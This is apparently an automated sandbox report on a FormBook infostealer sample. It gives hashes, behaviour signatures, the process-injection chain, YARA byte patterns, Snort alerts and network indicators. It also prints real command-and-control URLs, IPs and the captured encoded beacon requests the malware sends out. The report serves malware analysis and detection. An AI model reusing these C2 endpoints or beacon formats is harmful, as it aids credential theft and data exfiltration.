
Windows Analysis Report
hkLFB22XxS.exe

Overview

General Information

Sample name: hkLFB22XxS.exe (renamed because original name is a hash value)
Original sample name: 04268eb791ba671f136525002bd4f25526b6d3e64b2b7b4e169df2498a2ea033.exe
Analysis ID: 1466070
MD5: 46d91dbe786e1518a8715e29f5fba781
SHA1: 5da70934c50a4a626ee73bc4797cfd24e60c5a96
SHA256: 04268eb791ba671f136525002bd4f25526b6d3e64b2b7b4e169df2498a2ea033
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • hkLFB22XxS.exe (PID: 64 cmdline: "C:\Users\user\Desktop\hkLFB22XxS.exe" MD5: 46D91DBE786E1518A8715E29F5FBA781)
    • svchost.exe (PID: 3776 cmdline: "C:\Users\user\Desktop\hkLFB22XxS.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • YcTurzUREEPNDwUlDlxzRT.exe (PID: 5464 cmdline: "C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • convert.exe (PID: 592 cmdline: "C:\Windows\SysWOW64\convert.exe" MD5: 2B1AC34AB72C95793CFE7E936F15389D)
          • YcTurzUREEPNDwUlDlxzRT.exe (PID: 280 cmdline: "C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1088 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000002.2571476306.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000002.00000002.2571476306.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2dda3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x173c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.4571790070.00000000028B0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000008.00000002.4571790070.00000000028B0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2a830:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13e4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000A.00000002.4580723330.0000000005200000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2cfa3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x165c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2dda3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x173c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\hkLFB22XxS.exe", CommandLine: "C:\Users\user\Desktop\hkLFB22XxS.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\hkLFB22XxS.exe", ParentImage: C:\Users\user\Desktop\hkLFB22XxS.exe, ParentProcessId: 64, ParentProcessName: hkLFB22XxS.exe, ProcessCommandLine: "C:\Users\user\Desktop\hkLFB22XxS.exe", ProcessId: 3776, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\hkLFB22XxS.exe", CommandLine: "C:\Users\user\Desktop\hkLFB22XxS.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\hkLFB22XxS.exe", ParentImage: C:\Users\user\Desktop\hkLFB22XxS.exe, ParentProcessId: 64, ParentProcessName: hkLFB22XxS.exe, ProcessCommandLine: "C:\Users\user\Desktop\hkLFB22XxS.exe", ProcessId: 3776, ProcessName: svchost.exe
Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
07/02/24-14:03:53.795147 | 2855465 | 49734 | 80 | TCP | A Network Trojan was detected
07/02/24-14:04:07.263536 | 2855465 | 49738 | 80 | TCP | A Network Trojan was detected
07/02/24-14:02:54.728878 | 2855465 | 49719 | 80 | TCP | A Network Trojan was detected
07/02/24-14:04:48.099149 | 2855465 | 49751 | 80 | TCP | A Network Trojan was detected
07/02/24-14:05:14.826284 | 2855465 | 49759 | 80 | TCP | A Network Trojan was detected
07/02/24-14:05:01.357570 | 2855465 | 49755 | 80 | TCP | A Network Trojan was detected
07/02/24-14:04:33.563081 | 2855465 | 49747 | 80 | TCP | A Network Trojan was detected
07/02/24-14:05:57.280319 | 2855465 | 49772 | 80 | TCP | A Network Trojan was detected
07/02/24-14:05:28.296564 | 2855465 | 49763 | 80 | TCP | A Network Trojan was detected
07/02/24-14:05:42.763941 | 2855465 | 49768 | 80 | TCP | A Network Trojan was detected
07/02/24-14:03:26.452953 | 2855465 | 49724 | 80 | TCP | A Network Trojan was detected
07/02/24-14:04:20.406030 | 2855465 | 49743 | 80 | TCP | A Network Trojan was detected
07/02/24-14:03:39.747488 | 2855465 | 49730 | 80 | TCP | A Network Trojan was detected


AV Detection

Source: http://www.rebornqababy.ru/waey/ | Avira URL Cloud: Label: malware
Source: http://www.autonomyai.xyz/b2v9/?GBbljTO=0sOIBL6Y1M004sQ5TvZd5iz/+VJrlsE2TnBUG2Cle0uPodabdAFumCtHEYRGqgGZaXBiOoh6miWUokUDwH1uxZLkB2zaEttNK0EmqhWvcq3hRWFyql4+CgnPikYYPSDEc9yry/0=&mB=rL4lP | Avira URL Cloud: Label: malware
Source: http://www.erosonline.com.br/2lcx/ | Avira URL Cloud: Label: malware
Source: http://www.autonomyai.xyz/b2v9/ | Avira URL Cloud: Label: malware
Source: http://www.bulletinnest.com/r7gq/ | Avira URL Cloud: Label: malware
Source: http://www.bulletinnest.com/r7gq/?GBbljTO=J5YXCuAbT0imQyqe16hzUfFFlDgtP40GBYCO3M0UAxiKR6OMc8IU/OmfKBQVi2nAD0slqU03Fjqs2wbSr2/73QjcpJUwGjWcGd039QJH+viAIsBs41Zzvp+05pTyuEBiwTKkz9s=&mB=rL4lP | Avira URL Cloud: Label: malware
Source: http://www.erosonline.com.br/2lcx/?mB=rL4lP&GBbljTO=a0QfEZLGBdPS9CupDmnnPsWDKzErLSGek8yDxBQcwyKMQFiimN077KRHkaCGiYerfpBHWbRAiBI+CxxxyL+dNlx1E9UxGMH9Wp+KkC7SZXFmjq4jPFSCThF16iUos8QU5jw0D9M= | Avira URL Cloud: Label: malware
Source: http://www.rebornqababy.ru/waey/?mB=rL4lP&GBbljTO=vEbjId+4sF/B1HcK0KnkLWhDt3TDgep1Hisls3jx2sXQLvzc6GGIRAe645U1+0UQoLxHlXEWQ40RpQdm4vEPEKgmfigQSYTBcDja0ho8qyrlnSuwRRMraqkdBe97SwcqQ2Bw4z4= | Avira URL Cloud: Label: malware
Source: http://bulletinnest.com/r7gq/?GBbljTO=J5YXCuAbT0imQyqe16hzUfFFlDgtP40GBYCO3M0UAxiKR6OMc8IU/OmfKBQVi2 | Avira URL Cloud: Label: malware
Source: hkLFB22XxS.exe | ReversingLabs: Detection: 67%
Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2571476306.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4571790070.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.4580723330.0000000005200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4568789406.0000000000230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4571023463.0000000002870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2571552452.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4578971846.0000000003210000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2572095157.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: hkLFB22XxS.exe | Joe Sandbox ML: detected
Source: hkLFB22XxS.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: convert.pdb | source: svchost.exe, 00000002.00000002.2571611959.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2540180988.000000000081A000.00000004.00000020.00020000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000003.2509356666.0000000000AFB000.00000004.00000020.00020000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000002.4578051292.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000000.2493538091.0000000000A0E000.00000002.00000001.01000000.00000005.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4570865384.0000000000A0E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP | source: hkLFB22XxS.exe, 00000001.00000003.2109624765.0000000004110000.00000004.00001000.00020000.00000000.sdmp, hkLFB22XxS.exe, 00000001.00000003.2108731153.0000000004260000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2478694477.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2476600596.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2571696469.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2571696469.000000000309E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000008.00000002.4579007671.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000008.00000002.4579007671.0000000002F4E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000008.00000003.2573868861.0000000002BFF000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000008.00000003.2571707288.00000000029F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: hkLFB22XxS.exe, 00000001.00000003.2109624765.0000000004110000.00000004.00001000.00020000.00000000.sdmp, hkLFB22XxS.exe, 00000001.00000003.2108731153.0000000004260000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2478694477.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2476600596.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2571696469.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2571696469.000000000309E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, convert.exe, 00000008.00000002.4579007671.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000008.00000002.4579007671.0000000002F4E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000008.00000003.2573868861.0000000002BFF000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000008.00000003.2571707288.00000000029F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: convert.pdbGCTL | source: svchost.exe, 00000002.00000002.2571611959.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2540180988.000000000081A000.00000004.00000020.00020000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000003.2509356666.0000000000AFB000.00000004.00000020.00020000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000002.4578051292.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb | source: convert.exe, 00000008.00000002.4580175851.00000000033DC000.00000004.10000000.00040000.00000000.sdmp, convert.exe, 00000008.00000002.4573809328.0000000002904000.00000004.00000020.00020000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4578831605.0000000002DCC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2852069782.000000003189C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP | source: convert.exe, 00000008.00000002.4580175851.00000000033DC000.00000004.10000000.00040000.00000000.sdmp, convert.exe, 00000008.00000002.4573809328.0000000002904000.00000004.00000020.00020000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4578831605.0000000002DCC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2852069782.000000003189C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\hkLFB22XxS.exe | Code function: 1_2_00874696 GetFileAttributesW,FindFirstFileW,FindClose, 1_2_00874696
Source: C:\Users\user\Desktop\hkLFB22XxS.exe | Code function: 1_2_0087C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 1_2_0087C9C7
Source: C:\Users\user\Desktop\hkLFB22XxS.exe | Code function: 1_2_0087C93C FindFirstFileW,FindClose, 1_2_0087C93C
Source: C:\Users\user\Desktop\hkLFB22XxS.exe | Code function: 1_2_0087F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_0087F200
Source: C:\Users\user\Desktop\hkLFB22XxS.exe | Code function: 1_2_0087F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_0087F35D
Source: C:\Users\user\Desktop\hkLFB22XxS.exe | Code function: 1_2_0087F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_0087F65E
Source: C:\Users\user\Desktop\hkLFB22XxS.exe | Code function: 1_2_00873A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 1_2_00873A2B
Source: C:\Users\user\Desktop\hkLFB22XxS.exe | Code function: 1_2_00873D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 1_2_00873D4E
Source: C:\Users\user\Desktop\hkLFB22XxS.exe | Code function: 1_2_0087BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_0087BF27
Source: C:\Windows\SysWOW64\convert.exe | Code function: 8_2_0024BB30 FindFirstFileW,FindNextFileW,FindClose, 8_2_0024BB30
Source: C:\Windows\SysWOW64\convert.exe | Code function: 4x nop then xor eax, eax | 8_2_00239720
Source: C:\Windows\SysWOW64\convert.exe | Code function: 4x nop then mov ebx, 00000004h | 8_2_02AA0548

Networking

Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49719 -> 65.181.132.158:80
Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49724 -> 3.33.130.190:80
Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49730 -> 203.161.43.228:80
Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49734 -> 38.47.158.215:80
Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49738 -> 3.33.130.190:80
Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49743 -> 3.33.130.190:80
Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49747 -> 15.197.142.173:80
Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49751 -> 108.186.253.49:80
Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49755 -> 3.33.130.190:80
Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49759 -> 87.236.19.243:80
Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49763 -> 135.181.212.206:80
Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49768 -> 191.6.208.133:80
Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49772 -> 188.114.97.3:80
Source: DNS query: www.cloudsoda.xyz
Source: DNS query: www.d99qtpkvavjj.xyz
Source: DNS query: www.autonomyai.xyz
Source: Joe Sandbox View | IP Address: 203.161.43.228
Source: Joe Sandbox View | IP Address: 135.181.212.206
Source: Joe Sandbox View | ASN Name: VNPT-AS-VNVNPTCorpVN
Source: Joe Sandbox View | ASN Name: HETZNER-ASDE
Source: Joe Sandbox View | ASN Name: PEGTECHINCUS
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008825E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,1_2_008825E2
            Source: global trafficHTTP traffic detected: GET /r4wk/?mB=rL4lP&GBbljTO=x9GkKIHXkLsCiyVr8u8o1dWkHkpveCE8pq06snQr36Jjj9CRM0vMnoakwWLgrIMHyYBq6SPCqUTgPlgJ6rJOIdv2Hpbl0D0DeBG+01R28dU1nzrJm0yQzAnZDQ+iQUJ8Z49zmcM= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.jl884.vipUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /r4rr/?mB=rL4lP&GBbljTO=P1tofVXty140xBSVPpIW7gyirVvbbq4ZmtvRMfQ3vINp97U+jPeKOpbNf/zhxpBeUYTaF1cbY1dyJwJUzhljlqDDW4HDHYbLyZqwGog3PQGSgYYOSWyGo81KbSWrkgyrx66NLVM= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.d99qtpkvavjj.xyzUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /02nb/?GBbljTO=wAM00RPxm4SI4CXmbVVIy3I1PpnrRkiLCY5B6OI1JPNyCoxACldRit5a2XiaNEn9mU81Z8Y/J9c7Sme1Jv71eMMWXuG1yY1QMiMjNPzXdj8brJHDqS7NAGlwA4SgIkhB8sM3B24=&mB=rL4lP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.firmshow.topUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /g67v/?mB=rL4lP&GBbljTO=c8M7uxZhudpInUsrkR2DFEXxpEFo+k2F1tpwZ/KeEHHRQR8ISdL3H7dZekm83GXANV8iiloQGx74ti2jjfGNAYcI3yUU4CBSy8RpmuksmnDwDcPq/qJ2CnRI4iJcuZj+GnE/ihc= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.jl800.vipUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /frbh/?GBbljTO=Ab6vpDSK2Brwe75JZoMyqaMvDHsAkCPA2P9OUDXWAzTXqR+fdlaTQvVfgW4hOBJepAqkmb7wk13CIWkS+xjXxgvfntXYbzbMYjBsDXbn2M5yrvr+d9Np/nCfHBQ0eV5fDAaNGRM=&mB=rL4lP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.theridleysuk.co.ukUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /a7b7/?mB=rL4lP&GBbljTO=WBvhIJsiSZ/Mpf8vspJrW/4pjpLKDJYga2inWWxcAarnmjt55lmBuwg8tb7lhDgj0p/kM0sabX/Eh7nxTer92pVV4vHw9Nn4rOH01OSzROy3Dd2AlIGGpSa7+8s++24x8ediPqQ= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.dexiangovernment.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /b2v9/?GBbljTO=0sOIBL6Y1M004sQ5TvZd5iz/+VJrlsE2TnBUG2Cle0uPodabdAFumCtHEYRGqgGZaXBiOoh6miWUokUDwH1uxZLkB2zaEttNK0EmqhWvcq3hRWFyql4+CgnPikYYPSDEc9yry/0=&mB=rL4lP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.autonomyai.xyzUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ofk1/?mB=rL4lP&GBbljTO=BhKqFmuQRptfX/n+GLbvkgrrHWTCYt1Sl5iEedmrVDCnsV4u7G/8RrJF9Ts24XSLey5WO/1p/DVfbDYr/r26W2Tj1BdpAMniD2/mHks2VLu3GzKm6FI2X0B8Walyh6GsFs9hylc= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.faxinguxn6.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /4ez3/?GBbljTO=mfYMsQM3KyhOB9S5RaSW2y5rLmzLgjaa/QLQwIqVV5WYQs45zP0evK7Rjl9k70QaNBAPkr49MsiTFVYwFYBU4UL5Zbi/2lnbDdmhQHx5hvKSlaviHFa+lVmdn2kx/MOS+LGOACo=&mB=rL4lP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.hereboy.co.ukUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /waey/?mB=rL4lP&GBbljTO=vEbjId+4sF/B1HcK0KnkLWhDt3TDgep1Hisls3jx2sXQLvzc6GGIRAe645U1+0UQoLxHlXEWQ40RpQdm4vEPEKgmfigQSYTBcDja0ho8qyrlnSuwRRMraqkdBe97SwcqQ2Bw4z4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.rebornqababy.ruUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /r7gq/?GBbljTO=J5YXCuAbT0imQyqe16hzUfFFlDgtP40GBYCO3M0UAxiKR6OMc8IU/OmfKBQVi2nAD0slqU03Fjqs2wbSr2/73QjcpJUwGjWcGd039QJH+viAIsBs41Zzvp+05pTyuEBiwTKkz9s=&mB=rL4lP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.bulletinnest.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
